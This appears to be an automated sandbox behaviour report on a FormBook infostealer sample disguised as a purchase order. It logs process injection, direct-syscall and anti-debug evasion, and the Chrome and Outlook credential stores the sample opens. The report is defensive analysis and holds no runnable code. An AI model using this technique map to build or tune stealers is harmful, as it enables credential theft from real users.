Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\PO #86637.exe

API/Special instruction interceptor: Address: 213224

Source: C:\Windows\SysWOW64\netbtugc.exe

Window / User API: threadDelayed 9841

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sqlite3.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3752	Thread sleep count: 128 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3752	Thread sleep time: -256000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3824	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3752	Thread sleep count: 9841 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 3752	Thread sleep time: -19682000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe TID: 3776	Thread sleep time: -75000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe TID: 3776	Thread sleep time: -33000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\netbtugc.exe	File Volume queried: C:\Users\user\AppData\Local FullSizeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQueryInformationProcess: Direct from: 0x774CFAFA	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtCreateUserProcess: Direct from: 0x774D093E	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtCreateKey: Direct from: 0x774CFB62	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQuerySystemInformation: Direct from: 0x774D20DE	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQueryDirectoryFile: Direct from: 0x774CFDBA	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtClose: Direct from: 0x774CFA02
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtWriteVirtualMemory: Direct from: 0x774D213E	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtCreateFile: Direct from: 0x774D00D6	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtSetTimer: Direct from: 0x774D021A	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtOpenFile: Direct from: 0x774CFD86	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtSetInformationThread: Direct from: 0x774E9893	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtOpenKeyEx: Direct from: 0x774CFA4A	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtAllocateVirtualMemory: Direct from: 0x774CFAE2	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtResumeThread: Direct from: 0x774D008D	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtOpenKeyEx: Direct from: 0x774D103A	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtUnmapViewOfSection: Direct from: 0x774CFCA2	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtDelayExecution: Direct from: 0x774CFDA1	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtSetInformationProcess: Direct from: 0x774CFB4A	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtSetInformationThread: Direct from: 0x774CF9CE	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtReadFile: Direct from: 0x774CF915	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtMapViewOfSection: Direct from: 0x774CFC72	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtCreateThreadEx: Direct from: 0x774D08C6	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtDeviceIoControlFile: Direct from: 0x774CF931	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtRequestWaitReplyPort: Direct from: 0x753C6BCE	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQueryValueKey: Direct from: 0x774CFACA	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtOpenSection: Direct from: 0x774CFDEA	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtProtectVirtualMemory: Direct from: 0x774D005A	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtWriteVirtualMemory: Direct from: 0x774CFE36	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtRequestWaitReplyPort: Direct from: 0x756F8D92	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQueryVolumeInformationFile: Direct from: 0x774CFFAE	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtNotifyChangeKey: Direct from: 0x774D0F92	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQueryAttributesFile: Direct from: 0x774CFE7E	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtReadVirtualMemory: Direct from: 0x774CFEB2	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtSetTimer: Direct from: 0x774E98D5	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtSetInformationFile: Direct from: 0x774CFC5A	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	NtQuerySystemInformation: Direct from: 0x774CFDD2	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\PO #86637.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: NULL target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\netbtugc.exe

Thread APC queued: target process: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\PO #86637.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008

Jump to behavior

Source: C:\Users\user\Desktop\PO #86637.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #86637.exe"	Jump to behavior
Source: C:\Program Files (x86)\GAGgNHJZaOdAlYkHEbHmVZkaWQJakoLJBBezUBoftBKWpeSuKdZhbEcLnP\fhSlYsGoxBSrK.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: PO #86637.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: fhSlYsGoxBSrK.exe, 00000003.00000000.375941523.0000000000A10000.00000002.00000001.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000003.00000002.753455162.0000000000A10000.00000002.00000001.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.408977216.0000000000A90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: fhSlYsGoxBSrK.exe, 00000003.00000000.375941523.0000000000A10000.00000002.00000001.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000003.00000002.753455162.0000000000A10000.00000002.00000001.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.408977216.0000000000A90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: fhSlYsGoxBSrK.exe, 00000003.00000000.375941523.0000000000A10000.00000002.00000001.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000003.00000002.753455162.0000000000A10000.00000002.00000001.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000000.408977216.0000000000A90000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: !Progman

Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\4zh4wl.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\wtypr.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\udapmlz.zip VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 00000002.00000002.394506656.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.477446338.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.753541101.0000000001E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753341793.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.394472558.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753316396.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.753330363.00000000001F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.753525101.0000000004720000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.395236048.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001	Jump to behavior

Remote Access Functionality

Yara detected FormBook

